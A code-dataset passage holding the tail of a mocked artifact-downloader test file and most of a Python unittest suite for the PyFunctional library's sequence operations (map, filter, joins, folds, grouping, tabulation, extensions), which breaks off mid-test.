second_dirctory_creation = call(self.download_directory + '/other/different', exist_ok=True)
self.make_directory_mock.assert_has_calls([first_dirctory_creation, second_dirctory_creation])
def test_downloads_only_files_with_specified_source_directory(self):
self._mock_file_list(['different/file', 'other/different/file'])
self.artifact_downloader.download_files('other/', self.download_directory)
self.mock_archiver.fetch_persisted_file.assert_called_once_with('other/different/file', self.download_directory + '/other/different/file')
def test_downloads_only_files_with_specified_source_directory_with_different_source_directory(self):
self._mock_file_list(['different/file', 'other/different/file'])
self.artifact_downloader.download_files('different/', self.download_directory)
self.mock_archiver.fetch_persisted_file.assert_called_once_with('different/file', self.download_directory + '/different/file')
def test_download_does_not_include_foundations_files(self):
for foundations_file in self.mock_foundations_files:
self._mock_file_list(['path/to/some/file', foundations_file])
self.artifact_downloader.download_files('', self.download_directory)
self.mock_archiver.fetch_persisted_file.assert_called_with('path/to/some/file', self.download_directory + '/path/to/some/file')
def test_download_includes_config_yamls(self):
for foundations_file in self.mock_foundations_files:
self._mock_file_list(['a.config.yaml', foundations_file])
self.artifact_downloader.download_files('', self.download_directory)
self.mock_archiver.fetch_persisted_file.assert_called_with('a.config.yaml', self.download_directory + '/a.config.yaml')
def _mock_file_list(self, file_list):
self.mock_archiver.fetch_miscellaneous = ConditionalReturn()
self.mock_archiver.fetch_miscellaneous.return_when(file_list, 'job_artifact_listing.pkl') | 2.328125 | 2 |
lib/python3.5/functional/test/test_functional.py | mklan/NX-Rom-Market | 21 | 11008 | <filename>lib/python3.5/functional/test/test_functional.py
# pylint: skip-file
import unittest
import array
from collections import namedtuple
from itertools import product
from functional.pipeline import Sequence, is_iterable, _wrap, extend
from functional.transformations import name
from functional import seq, pseq
Data = namedtuple("Data", "x y")
def pandas_is_installed():
try:
global pandas
import pandas
return True
except ImportError:
return False
class TestPipeline(unittest.TestCase):
def setUp(self):
self.seq = seq
def assert_type(self, s):
self.assertTrue(isinstance(s, Sequence))
def assert_not_type(self, s):
self.assertFalse(isinstance(s, Sequence))
def assertIteratorEqual(self, iter_0, iter_1):
seq_0 = list(iter_0)
seq_1 = list(iter_1)
self.assertListEqual(seq_0, seq_1)
def test_is_iterable(self):
self.assertFalse(is_iterable([]))
self.assertTrue(is_iterable(iter([1, 2])))
def test_constructor(self):
self.assertRaises(TypeError, lambda: Sequence(1))
def test_base_sequence(self):
l = []
self.assert_type(self.seq(l))
self.assert_not_type(self.seq(l).sequence)
self.assert_type(self.seq(self.seq(l)))
self.assert_not_type(self.seq(self.seq(l)).sequence)
self.assert_not_type(self.seq(l)._base_sequence)
def test_eq(self):
l = [1, 2, 3]
self.assertIteratorEqual(self.seq(l).map(lambda x: x), self.seq(l))
def test_ne(self):
a = [1, 2, 3]
b = [1]
self.assertNotEqual(self.seq(a), self.seq(b))
def test_repr(self):
l = [1, 2, 3]
self.assertEqual(repr(l), repr(self.seq(l)))
def test_lineage_name(self):
f = lambda x: x
self.assertEqual(f.__name__, name(f))
f = "test"
self.assertEqual("test", name(f))
def test_str(self):
l = [1, 2, 3]
self.assertEqual(str(l), str(self.seq(l)))
def test_hash(self):
self.assertRaises(TypeError, lambda: hash(self.seq([1])))
def test_len(self):
l = [1, 2, 3]
s = self.seq(l)
self.assertEqual(len(l), s.size())
self.assertEqual(len(l), s.len())
def test_count(self):
l = self.seq([-1, -1, 1, 1, 1])
self.assertEqual(l.count(lambda x: x > 0), 3)
self.assertEqual(l.count(lambda x: x < 0), 2)
def test_getitem(self):
l = [1, 2, [3, 4, 5]]
s = self.seq(l).map(lambda x: x)
self.assertEqual(s[1], 2)
self.assertEqual(s[2], [3, 4, 5])
self.assert_type(s[2])
self.assertEqual(s[1:], [2, [3, 4, 5]])
self.assert_type(s[1:])
l = [{1, 2}, {2, 3}, {4, 5}]
s = self.seq(l)
self.assertIsInstance(s[0], set)
self.assertEqual(s[0], l[0])
def test_iter(self):
l = list(enumerate(self.seq([1, 2, 3])))
e = list(enumerate([1, 2, 3]))
self.assertEqual(l, e)
l = self.seq([1, 2, 3])
e = [1, 2, 3]
result = []
for n in l:
result.append(n)
self.assertEqual(result, e)
self.assert_type(l)
def test_contains(self):
string = "abcdef"
s = self.seq(iter(string)).map(lambda x: x)
self.assertTrue("c" in s)
def test_add(self):
l0 = self.seq([1, 2, 3]).map(lambda x: x)
l1 = self.seq([4, 5, 6])
l2 = [4, 5, 6]
expect = [1, 2, 3, 4, 5, 6]
self.assertEqual(l0 + l1, expect)
self.assertEqual(l0 + l2, expect)
def test_head(self):
l = self.seq([1, 2, 3]).map(lambda x: x)
self.assertEqual(l.head(), 1)
l = self.seq([[1, 2], 3, 4])
self.assertEqual(l.head(), [1, 2])
self.assert_type(l.head())
l = self.seq([])
with self.assertRaises(IndexError):
l.head()
def test_first(self):
l = self.seq([1, 2, 3]).map(lambda x: x)
self.assertEqual(l.first(), 1)
l = self.seq([[1, 2], 3, 4]).map(lambda x: x)
self.assertEqual(l.first(), [1, 2])
self.assert_type(l.first())
l = self.seq([])
with self.assertRaises(IndexError):
l.head()
def test_head_option(self):
l = self.seq([1, 2, 3]).map(lambda x: x)
self.assertEqual(l.head_option(), 1)
l = self.seq([[1, 2], 3, 4]).map(lambda x: x)
self.assertEqual(l.head_option(), [1, 2])
self.assert_type(l.head_option())
l = self.seq([])
self.assertIsNone(l.head_option())
def test_last(self):
l = self.seq([1, 2, 3]).map(lambda x: x)
self.assertEqual(l.last(), 3)
l = self.seq([1, 2, [3, 4]]).map(lambda x: x)
self.assertEqual(l.last(), [3, 4])
self.assert_type(l.last())
def test_last_option(self):
l = self.seq([1, 2, 3]).map(lambda x: x)
self.assertEqual(l.last_option(), 3)
l = self.seq([1, 2, [3, 4]]).map(lambda x: x)
self.assertEqual(l.last_option(), [3, 4])
self.assert_type(l.last_option())
l = self.seq([])
self.assertIsNone(l.last_option())
def test_init(self):
result = self.seq([1, 2, 3, 4]).map(lambda x: x).init()
expect = [1, 2, 3]
self.assertIteratorEqual(result, expect)
def test_tail(self):
l = self.seq([1, 2, 3, 4]).map(lambda x: x)
expect = [2, 3, 4]
self.assertIteratorEqual(l.tail(), expect)
def test_inits(self):
l = self.seq([1, 2, 3]).map(lambda x: x)
expect = [[1, 2, 3], [1, 2], [1], []]
self.assertIteratorEqual(l.inits(), expect)
self.assertIteratorEqual(l.inits().map(lambda s: s.sum()), [6, 3, 1, 0])
def test_tails(self):
l = self.seq([1, 2, 3]).map(lambda x: x)
expect = [[1, 2, 3], [2, 3], [3], []]
self.assertIteratorEqual(l.tails(), expect)
self.assertIteratorEqual(l.tails().map(lambda s: s.sum()), [6, 5, 3, 0])
def test_drop(self):
s = self.seq([1, 2, 3, 4, 5, 6])
expect = [5, 6]
result = s.drop(4)
self.assertIteratorEqual(result, expect)
self.assert_type(result)
self.assertIteratorEqual(s.drop(0), s)
self.assertIteratorEqual(s.drop(-1), s)
def test_drop_right(self):
s = self.seq([1, 2, 3, 4, 5]).map(lambda x: x)
expect = [1, 2, 3]
result = s.drop_right(2)
self.assert_type(result)
self.assertIteratorEqual(result, expect)
self.assertIteratorEqual(s.drop_right(0), s)
self.assertIteratorEqual(s.drop_right(-1), s)
def test_drop_while(self):
l = [1, 2, 3, 4, 5, 6, 7, 8]
f = lambda x: x < 4
expect = [4, 5, 6, 7, 8]
result = self.seq(l).drop_while(f)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_take(self):
s = self.seq([1, 2, 3, 4, 5, 6])
expect = [1, 2, 3, 4]
result = s.take(4)
self.assertIteratorEqual(result, expect)
self.assert_type(result)
self.assertIteratorEqual(s.take(0), self.seq([]))
self.assertIteratorEqual(s.take(-1), self.seq([]))
def test_take_while(self):
l = [1, 2, 3, 4, 5, 6, 7, 8]
f = lambda x: x < 4
expect = [1, 2, 3]
result = self.seq(l).take_while(f)
self.assertIteratorEqual(result, expect)
self.assert_type(result)
def test_union(self):
result = self.seq([1, 1, 2, 3, 3]).union([1, 4, 5])
expect = [1, 2, 3, 4, 5]
self.assert_type(result)
self.assertSetEqual(result.set(), set(expect))
def test_intersection(self):
result = self.seq([1, 2, 2, 3]).intersection([2, 3, 4, 5])
expect = [2, 3]
self.assert_type(result)
self.assertSetEqual(result.set(), set(expect))
def test_difference(self):
result = self.seq([1, 2, 3]).difference([2, 3, 4])
expect = [1]
self.assert_type(result)
self.assertSetEqual(result.set(), set(expect))
def test_symmetric_difference(self):
result = self.seq([1, 2, 3, 3]).symmetric_difference([2, 4, 5])
expect = [1, 3, 4, 5]
self.assert_type(result)
self.assertSetEqual(result.set(), set(expect))
def test_map(self):
f = lambda x: x * 2
l = [1, 2, 0, 5]
expect = [2, 4, 0, 10]
result = self.seq(l).map(f)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_select(self):
f = lambda x: x * 2
l = [1, 2, 0, 5]
expect = [2, 4, 0, 10]
result = self.seq(l).select(f)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_starmap(self):
f = lambda x, y: x * y
l = [(1, 1), (0, 3), (-3, 3), (4, 2)]
expect = [1, 0, -9, 8]
result = self.seq(l).starmap(f)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
result = self.seq(l).smap(f)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_filter(self):
f = lambda x: x > 0
l = [0, -1, 5, 10]
expect = [5, 10]
s = self.seq(l)
result = s.filter(f)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_where(self):
f = lambda x: x > 0
l = [0, -1, 5, 10]
expect = [5, 10]
s = self.seq(l)
result = s.where(f)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_filter_not(self):
f = lambda x: x > 0
l = [0, -1, 5, 10]
expect = [0, -1]
result = self.seq(l).filter_not(f)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_map_filter(self):
f = lambda x: x > 0
g = lambda x: x * 2
l = [0, -1, 5]
s = self.seq(l)
expect = [10]
result = s.filter(f).map(g)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_reduce(self):
f = lambda x, y: x + y
l = ["a", "b", "c"]
expect = "abc"
s = self.seq(l)
self.assertEqual(expect, s.reduce(f))
with self.assertRaises(TypeError):
seq([]).reduce(f)
with self.assertRaises(ValueError):
seq([]).reduce(f, 0, 0)
self.assertEqual(seq([]).reduce(f, 1), 1)
self.assertEqual(seq([0, 2]).reduce(f, 1), 3)
def test_accumulate(self):
f = lambda x, y: x + y
l_char = ["a", "b", "c"]
expect_char = ["a", "ab", "abc"]
l_num = [1, 2, 3]
expect_num = [1, 3, 6]
self.assertEqual(seq(l_char).accumulate(), expect_char)
self.assertEqual(seq(l_num).accumulate(), expect_num)
def test_aggregate(self):
f = lambda current, next_element: current + next_element
l = self.seq([1, 2, 3, 4])
self.assertEqual(l.aggregate(f), 10)
self.assertEqual(l.aggregate(0, f), 10)
self.assertEqual(l.aggregate(0, f, lambda x: 2 * x), 20)
l = self.seq(["a", "b", "c"])
self.assertEqual(l.aggregate(f), "abc")
self.assertEqual(l.aggregate("", f), "abc")
self.assertEqual(l.aggregate("", f, lambda x: x.upper()), "ABC")
self.assertEqual(l.aggregate(f), "abc")
self.assertEqual(l.aggregate("z", f), "zabc")
self.assertEqual(l.aggregate("z", f, lambda x: x.upper()), "ZABC")
with self.assertRaises(ValueError):
l.aggregate()
with self.assertRaises(ValueError):
l.aggregate(None, None, None, None)
def test_fold_left(self):
f = lambda current, next_element: current + next_element
l = self.seq([1, 2, 3, 4])
self.assertEqual(l.fold_left(0, f), 10)
self.assertEqual(l.fold_left(-10, f), 0)
l = self.seq(["a", "b", "c"])
self.assertEqual(l.fold_left("", f), "abc")
self.assertEqual(l.fold_left("z", f), "zabc")
f = lambda x, y: x + [y]
self.assertEqual(l.fold_left([], f), ["a", "b", "c"])
self.assertEqual(l.fold_left(["start"], f), ["start", "a", "b", "c"])
def test_fold_right(self):
f = lambda next_element, current: current + next_element
l = self.seq([1, 2, 3, 4])
self.assertEqual(l.fold_right(0, f), 10)
self.assertEqual(l.fold_right(-10, f), 0)
l = self.seq(["a", "b", "c"])
self.assertEqual(l.fold_right("", f), "cba")
self.assertEqual(l.fold_right("z", f), "zcba")
f = lambda next_element, current: current + [next_element]
self.assertEqual(l.fold_right([], f), ["c", "b", "a"])
self.assertEqual(l.fold_right(["start"], f), ["start", "c", "b", "a"])
def test_sorted(self):
s = self.seq([1, 3, 2, 5, 4])
r = s.sorted()
self.assertIteratorEqual([1, 2, 3, 4, 5], r)
self.assert_type(r)
def test_order_by(self):
s = self.seq([(2, "a"), (1, "b"), (4, "c"), (3, "d")])
r = s.order_by(lambda x: x[0])
self.assertIteratorEqual([(1, "b"), (2, "a"), (3, "d"), (4, "c")], r)
self.assert_type(r)
def test_reverse(self):
l = [1, 2, 3]
expect = [4, 3, 2]
s = self.seq(l).map(lambda x: x + 1)
result = s.reverse()
self.assertIteratorEqual(expect, result)
self.assert_type(result)
result = s.__reversed__()
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_distinct(self):
l = [1, 1, 2, 3, 2, 3]
expect = [1, 2, 3]
s = self.seq(l)
result = s.distinct()
for e in result:
self.assertTrue(e in expect)
result = s.distinct()
self.assertEqual(result.size(), len(expect))
self.assert_type(result)
def test_distinct_by(self):
s = self.seq(Data(1, 2), Data(1, 3), Data(2, 0), Data(3, -1), Data(1, 5))
expect = {Data(1, 2), Data(2, 0), Data(3, -1)}
result = s.distinct_by(lambda data: data.x)
self.assertSetEqual(set(result), expect)
self.assert_type(result)
def test_slice(self):
s = self.seq([1, 2, 3, 4])
result = s.slice(1, 2)
self.assertIteratorEqual(result, [2])
self.assert_type(result)
result = s.slice(1, 3)
self.assertIteratorEqual(result, [2, 3])
self.assert_type(result)
def test_any(self):
l = [True, False]
self.assertTrue(self.seq(l).any())
def test_all(self):
l = [True, False]
self.assertFalse(self.seq(l).all())
l = [True, True]
self.assertTrue(self.seq(l).all())
def test_enumerate(self):
l = [2, 3, 4]
e = [(0, 2), (1, 3), (2, 4)]
result = self.seq(l).enumerate()
self.assertIteratorEqual(result, e)
self.assert_type(result)
def test_inner_join(self):
l0 = [("a", 1), ("b", 2), ("c", 3)]
l1 = [("a", 2), ("c", 4), ("d", 5)]
result0 = self.seq(l0).inner_join(l1)
result1 = self.seq(l0).join(l1, "inner")
e = [("a", (1, 2)), ("c", (3, 4))]
self.assert_type(result0)
self.assert_type(result1)
self.assertDictEqual(dict(result0), dict(e))
self.assertDictEqual(dict(result1), dict(e))
result0 = self.seq(l0).inner_join(self.seq(l1))
result1 = self.seq(l0).join(self.seq(l1), "inner")
self.assert_type(result0)
self.assert_type(result1)
self.assertDictEqual(dict(result0), dict(e))
self.assertDictEqual(dict(result1), dict(e))
def test_left_join(self):
left = [("a", 1), ("b", 2)]
right = [("a", 2), ("c", 3)]
result0 = self.seq(left).left_join(right)
result1 = self.seq(left).join(right, "left")
expect = [("a", (1, 2)), ("b", (2, None))]
self.assert_type(result0)
self.assert_type(result1)
self.assertDictEqual(dict(result0), dict(expect))
self.assertDictEqual(dict(result1), dict(expect))
result0 = self.seq(left).left_join(self.seq(right))
result1 = self.seq(left).join(self.seq(right), "left")
self.assert_type(result0)
self.assert_type(result1)
self.assertDictEqual(dict(result0), dict(expect))
self.assertDictEqual(dict(result1), dict(expect))
def test_right_join(self):
left = [("a", 1), ("b", 2)]
right = [("a", 2), ("c", 3)]
result0 = self.seq(left).right_join(right)
result1 = self.seq(left).join(right, "right")
expect = [("a", (1, 2)), ("c", (None, 3))]
self.assert_type(result0)
self.assert_type(result1)
self.assertDictEqual(dict(result0), dict(expect))
self.assertDictEqual(dict(result1), dict(expect))
result0 = self.seq(left).right_join(self.seq(right))
result1 = self.seq(left).join(self.seq(right), "right")
self.assert_type(result0)
self.assert_type(result1)
self.assertDictEqual(dict(result0), dict(expect))
self.assertDictEqual(dict(result1), dict(expect))
def test_outer_join(self):
left = [("a", 1), ("b", 2)]
right = [("a", 2), ("c", 3)]
result0 = self.seq(left).outer_join(right)
result1 = self.seq(left).join(right, "outer")
expect = [("a", (1, 2)), ("b", (2, None)), ("c", (None, 3))]
self.assert_type(result0)
self.assert_type(result1)
self.assertDictEqual(dict(result0), dict(expect))
self.assertDictEqual(dict(result1), dict(expect))
result0 = self.seq(left).outer_join(self.seq(right))
result1 = self.seq(left).join(self.seq(right), "outer")
self.assert_type(result0)
self.assert_type(result1)
self.assertDictEqual(dict(result0), dict(expect))
self.assertDictEqual(dict(result1), dict(expect))
def test_join(self):
with self.assertRaises(TypeError):
self.seq([(1, 2)]).join([(2, 3)], "").to_list()
def test_max(self):
l = [1, 2, 3]
self.assertEqual(3, self.seq(l).max())
def test_min(self):
l = [1, 2, 3]
self.assertEqual(1, self.seq(l).min())
def test_max_by(self):
l = ["aa", "bbbb", "c", "dd"]
self.assertEqual("bbbb", self.seq(l).max_by(len))
def test_min_by(self):
l = ["aa", "bbbb", "c", "dd"]
self.assertEqual("c", self.seq(l).min_by(len))
def test_find(self):
l = [1, 2, 3]
f = lambda x: x == 3
g = lambda x: False
self.assertEqual(3, self.seq(l).find(f))
self.assertIsNone(self.seq(l).find(g))
def test_flatten(self):
l = [[1, 1, 1], [2, 2, 2], [[3, 3], [4, 4]]]
expect = [1, 1, 1, 2, 2, 2, [3, 3], [4, 4]]
result = self.seq(l).flatten()
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_flat_map(self):
l = [[1, 1, 1], [2, 2, 2], [3, 3, 3]]
f = lambda x: x
expect = [1, 1, 1, 2, 2, 2, 3, 3, 3]
result = self.seq(l).flat_map(f)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_group_by(self):
l = [(1, 1), (1, 2), (1, 3), (2, 2)]
f = lambda x: x[0]
expect = {1: [(1, 1), (1, 2), (1, 3)], 2: [(2, 2)]}
result = self.seq(l).group_by(f)
result_comparison = {}
for kv in result:
result_comparison[kv[0]] = kv[1]
self.assertIteratorEqual(expect, result_comparison)
self.assert_type(result)
def test_group_by_key(self):
l = [("a", 1), ("a", 2), ("a", 3), ("b", -1), ("b", 1), ("c", 10), ("c", 5)]
e = {"a": [1, 2, 3], "b": [-1, 1], "c": [10, 5]}.items()
result = self.seq(l).group_by_key()
self.assertEqual(result.len(), len(e))
for e0, e1 in zip(result, e):
self.assertIteratorEqual(e0, e1)
self.assert_type(result)
def test_grouped(self):
l = self.seq([1, 2, 3, 4, 5, 6, 7, 8])
expect = [[1, 2], [3, 4], [5, 6], [7, 8]]
self.assertIteratorEqual(map(list, l.grouped(2)), expect)
expect = [[1, 2, 3], [4, 5, 6], [7, 8]]
self.assertIteratorEqual(map(list, l.grouped(3)), expect)
def test_grouped_returns_list(self):
l = self.seq([1, 2, 3, 4, 5, 6, 7, 8])
self.assertTrue(is_iterable(l.grouped(2)))
self.assertTrue(is_iterable(l.grouped(3)))
def test_sliding(self):
l = self.seq([1, 2, 3, 4, 5, 6, 7])
expect = [[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [6, 7]]
self.assertIteratorEqual(l.sliding(2), expect)
l = self.seq([1, 2, 3])
expect = [[1, 2], [3]]
self.assertIteratorEqual(l.sliding(2, 2), expect)
expect = [[1, 2]]
self.assertIteratorEqual(l.sliding(2, 3), expect)
def test_empty(self):
self.assertTrue(self.seq([]).empty())
def test_non_empty(self):
self.assertTrue(self.seq([1]).non_empty())
def test_non_zero_bool(self):
self.assertTrue(bool(self.seq([1])))
self.assertFalse(bool(self.seq([])))
def test_make_string(self):
l = [1, 2, 3]
expect1 = "123"
expect2 = "1:2:3"
s = self.seq(l)
self.assertEqual(expect1, s.make_string(""))
self.assertEqual(expect2, s.make_string(":"))
s = self.seq([])
self.assertEqual("", s.make_string(""))
self.assertEqual("", s.make_string(":"))
def test_partition(self):
l = [-1, -2, -3, 1, 2, 3]
e2 = [-1, -2, -3]
e1 = [1, 2, 3]
f = lambda x: x > 0
s = self.seq(l)
p1, p2 = s.partition(f)
self.assertIteratorEqual(e1, list(p1))
self.assertIteratorEqual(e2, list(p2))
self.assert_type(p1)
self.assert_type(p2)
result = self.seq([[1, 2, 3], [4, 5, 6]]).flatten().partition(lambda x: x > 2)
expect = [[3, 4, 5, 6], [1, 2]]
self.assertIteratorEqual(expect, list(result))
self.assert_type(result)
def test_cartesian(self):
result = seq.range(3).cartesian(range(3)).list()
self.assertListEqual(result, list(product(range(3), range(3))))
result = seq.range(3).cartesian(range(3), range(2)).list()
self.assertListEqual(result, list(product(range(3), range(3), range(2))))
result = seq.range(3).cartesian(range(3), range(2), repeat=2).list()
self.assertListEqual(
result, list(product(range(3), range(3), range(2), repeat=2))
)
def test_product(self):
l = [2, 2, 3]
self.assertEqual(12, self.seq(l).product())
self.assertEqual(96, self.seq(l).product(lambda x: x * 2))
s = self.seq([])
self.assertEqual(1, s.product())
self.assertEqual(2, s.product(lambda x: x * 2))
s = self.seq([5])
self.assertEqual(5, s.product())
self.assertEqual(10, s.product(lambda x: x * 2))
def test_sum(self):
l = [1, 2, 3]
self.assertEqual(6, self.seq(l).sum())
self.assertEqual(12, self.seq(l).sum(lambda x: x * 2))
def test_average(self):
l = [1, 2]
self.assertEqual(1.5, self.seq(l).average())
self.assertEqual(4.5, self.seq(l).average(lambda x: x * 3))
def test_set(self):
l = [1, 1, 2, 2, 3]
ls = set(l)
self.assertIteratorEqual(ls, self.seq(l).set())
def test_zip(self):
l1 = [1, 2, 3]
l2 = [-1, -2, -3]
e = [(1, -1), (2, -2), (3, -3)]
result = self.seq(l1).zip(l2)
self.assertIteratorEqual(e, result)
self.assert_type(result)
def test_zip_with_index(self):
l = [2, 3, 4]
e = [(2, 0), (3, 1), (4, 2)]
result = self.seq(l).zip_with_index()
self.assertIteratorEqual(result, e)
self.assert_type(result)
e = [(2, 5), (3, 6), (4, 7)]
result = self.seq(l).zip_with_index(5)
self.assertIteratorEqual(result, e)
self.assert_type(result)
def test_to_list(self):
l = [1, 2, 3, "abc", {1: 2}, {1, 2, 3}]
result = self.seq(l).to_list()
self.assertIteratorEqual(result, l)
self.assertTrue(isinstance(result, list))
result = self.seq(iter([0, 1, 2])).to_list()
self.assertIsInstance(result, list)
result = self.seq(l).list(n=2)
self.assertEqual(result, [1, 2])
def test_list(self):
l = [1, 2, 3, "abc", {1: 2}, {1, 2, 3}]
result = self.seq(l).list()
self.assertEqual(result, l)
self.assertTrue(isinstance(result, list))
result = self.seq(iter([0, 1, 2])).to_list()
self.assertIsInstance(result, list)
result = self.seq(l).list(n=2)
self.assertEqual(result, [1, 2])
def test_for_each(self):
l = [1, 2, 3, "abc", {1: 2}, {1, 2, 3}]
result = []
def f(e):
result.append(e)
self.seq(l).for_each(f)
self.assertEqual(result, l)
def test_exists(self):
l = ["aaa", "BBB", "ccc"]
self.assertTrue(self.seq(l).exists(str.islower))
self.assertTrue(self.seq(l).exists(str.isupper))
self.assertFalse(self.seq(l).exists(lambda s: "d" in s))
def test_for_all(self):
l = ["aaa", "bbb", "ccc"]
self.assertTrue(self.seq(l).for_all(str.islower))
self.assertFalse(self.seq(l).for_all(str.isupper))
def test_to_dict(self):
l = [(1, 2), (2, 10), (7, 2)]
d = {1: 2, 2: 10, 7: 2}
result = self.seq(l).to_dict()
self.assertDictEqual(result, d)
self.assertTrue(isinstance(result, dict))
result = self.seq(l).to_dict(default=lambda: 100)
self.assertTrue(1 in result)
self.assertFalse(3 in result)
self.assertEqual(result[4], 100)
result = self.seq(l).dict(default=100)
self.assertTrue(1 in result)
self.assertFalse(3 in result)
self.assertEqual(result[4], 100)
def test_dict(self):
l = [(1, 2), (2, 10), (7, 2)]
d = {1: 2, 2: 10, 7: 2}
result = self.seq(l).dict()
self.assertDictEqual(result, d)
self.assertTrue(isinstance(result, dict))
result = self.seq(l).dict(default=lambda: 100)
self.assertTrue(1 in result)
self.assertFalse(3 in result)
self.assertEqual(result[4], 100)
result = self.seq(l).dict(default=100)
self.assertTrue(1 in result)
self.assertFalse(3 in result)
self.assertEqual(result[4], 100)
def test_reduce_by_key(self):
l = [("a", 1), ("a", 2), ("a", 3), ("b", -1), ("b", 1), ("c", 10), ("c", 5)]
e = {"a": 6, "b": 0, "c": 15}.items()
result = self.seq(l).reduce_by_key(lambda x, y: x + y)
self.assertEqual(result.len(), len(e))
for e0, e1 in zip(result, e):
self.assertEqual(e0, e1)
self.assert_type(result)
def test_count_by_key(self):
l = [
("a", 1),
("a", 2),
("a", 3),
("b", -1),
("b", 1),
("c", 10),
("c", 5),
("d", 1),
]
e = {"a": 3, "b": 2, "c": 2, "d": 1}.items()
result = self.seq(l).count_by_key()
self.assertEqual(result.len(), len(e))
for e0, e1 in zip(result, e):
self.assertEqual(e0, e1)
self.assert_type(result)
def test_count_by_value(self):
l = ["a", "a", "a", "b", "b", "c", "d"]
e = {"a": 3, "b": 2, "c": 1, "d": 1}.items()
result = self.seq(l).count_by_value()
self.assertEqual(result.len(), len(e))
for e0, e1 in zip(result, e):
self.assertEqual(e0, e1)
self.assert_type(result)
def test_wrap(self):
self.assert_type(_wrap([1, 2]))
self.assert_type(_wrap((1, 2)))
self.assert_not_type(_wrap(1))
self.assert_not_type(_wrap(1.0))
self.assert_not_type(_wrap("test"))
self.assert_not_type(_wrap(True))
self.assert_not_type(_wrap(Data(1, 2)))
def test_wrap_objects(self):
class A(object):
a = 1
l = [A(), A(), A()]
self.assertIsInstance(_wrap(A()), A)
self.assert_type(self.seq(l))
@unittest.skipUnless(
pandas_is_installed(), "Skip pandas tests if pandas is not installed"
)
def test_wrap_pandas(self):
df1 = pandas.DataFrame({"name": ["name1", "name2"], "value": [1, 2]})
df2 = pandas.DataFrame({"name": ["name1", "name2"], "value": [3, 4]})
result = seq([df1, df2]).reduce(lambda x, y: x.append(y))
self.assertEqual(result.len(), 4)
self.assertEqual(result[0].to_list(), ["name1", 1])
self.assertEqual(result[1].to_list(), ["name2", 2])
self.assertEqual(result[2].to_list(), ["name1", 3])
self.assertEqual(result[3].to_list(), ["name2", 4])
def test_iterator_consumption(self):
sequence = self.seq([1, 2, 3])
first_transform = sequence.map(lambda x: x)
second_transform = first_transform.map(lambda x: x)
first_list = list(first_transform)
second_list = list(second_transform)
expect = [1, 2, 3]
self.assertIteratorEqual(first_list, expect)
self.assertIteratorEqual(second_list, expect)
def test_single_call(self):
if self.seq is pseq:
raise self.skipTest("pseq doesn't support functions with side-effects")
counter = []
def counter_func(x):
counter.append(1)
return x
list(self.seq([1, 2, 3, 4]).map(counter_func))
self.assertEqual(len(counter), 4)
def test_seq(self):
self.assertIteratorEqual(self.seq([1, 2, 3]), [1, 2, 3])
self.assertIteratorEqual(self.seq(1, 2, 3), [1, 2, 3])
self.assertIteratorEqual(self.seq(1), [1])
self.assertIteratorEqual(self.seq(iter([1, 2, 3])), [1, 2, 3])
with self.assertRaises(TypeError):
self.seq()
def test_lineage_repr(self):
s = self.seq(1).map(lambda x: x).filter(lambda x: True)
self.assertEqual(
repr(s._lineage), "Lineage: sequence -> map(<lambda>) -> filter(<lambda>)"
)
def test_cache(self):
if self.seq is pseq:
raise self.skipTest("pseq doesn't support functions with side-effects")
calls = []
func = lambda x: calls.append(x)
result = self.seq(1, 2, 3).map(func).cache().map(lambda x: x).to_list()
self.assertEqual(len(calls), 3)
self.assertEqual(result, [None, None, None])
result = self.seq(1, 2, 3).map(lambda x: x).cache()
self.assertEqual(
repr(result._lineage), "Lineage: sequence -> map(<lambda>) -> cache"
)
result = self.seq(1, 2, 3).map(lambda x: x).cache(delete_lineage=True)
self.assertEqual(repr(result._lineage), "Lineage: sequence")
def test_tabulate(self):
sequence = seq([[1, 2, 3], [4, 5, 6]])
self.assertEqual(sequence.show(), None)
self.assertNotEqual(sequence._repr_html_(), None)
result = sequence.tabulate()
self.assertEqual(result, "- - -\n1 2 3\n4 5 6\n- - -")
sequence = seq(1, 2, 3)
self.assertEqual(sequence.tabulate(), None)
class NotTabulatable(object):
pass
sequence = seq(NotTabulatable(), NotTabulatable(), NotTabulatable())
self.assertEqual(sequence.tabulate(), None)
long_data = seq([(i, i + 1) for i in range(30)])
self.assertTrue("Showing 10 of 30 rows" in long_data.tabulate(n=10))
self.assertTrue("Showing 10 of 30 rows" in long_data._repr_html_())
self.assertTrue(
"Showing 10 of 30 rows" not in long_data.tabulate(n=10, tablefmt="plain")
)
def test_tabulate_namedtuple(self):
sequence_tabulated = seq([Data(1, 2), Data(6, 7)]).tabulate()
self.assertEqual(sequence_tabulated, " x y\n--- ---\n 1 2\n 6 7")
def test_repr_max_lines(self):
sequence = seq.range(200)
self.assertEqual(len(repr(sequence)), 395)
sequence._max_repr_items = None
self.assertEqual(len(repr(sequence)), 890)
class TestExtend(unittest.TestCase):
def test_custom_functions(self):
@extend(aslist=True)
def my_zip(it):
return zip(it, it)
result = seq.range(3).my_zip().list()
expected = list(zip(range(3), range(3)))
self.assertEqual(result, expected)
result = seq.range(3).my_zip().my_zip().list()
expected = list(zip(expected, expected))
self.assertEqual(result, expected)
@extend
def square(it):
return [i ** 2 for i in it]
result = seq.range(100).square().list()
expected = [i ** 2 for i in range(100)]
self.assertEqual(result, expected)
name = "PARALLEL_SQUARE"
@extend(parallel=True, name=name)
def square_parallel(it):
return [i ** 2 for i in it]
result = seq.range(100).square_parallel()
self.assertEqual(result.sum(), sum(expected))
self.assertEqual(
repr(result._lineage), "Lineage: sequence -> extended[%s]" % name
)
@extend
def my_filter(it, n=10):
return (i for i in it if i > n)
# test keyword args
result = seq.range(20).my_filter(n=10).list()
expected = list(filter(lambda x: x > 10, range(20)))
self.assertEqual(result, expected)
# test args
result = seq.range(20).my_filter(10).list()
self.assertEqual(result, expected)
# test final
@extend(final=True)
def toarray(it):
return array.array("f", it)
result = seq.range(10).toarray()
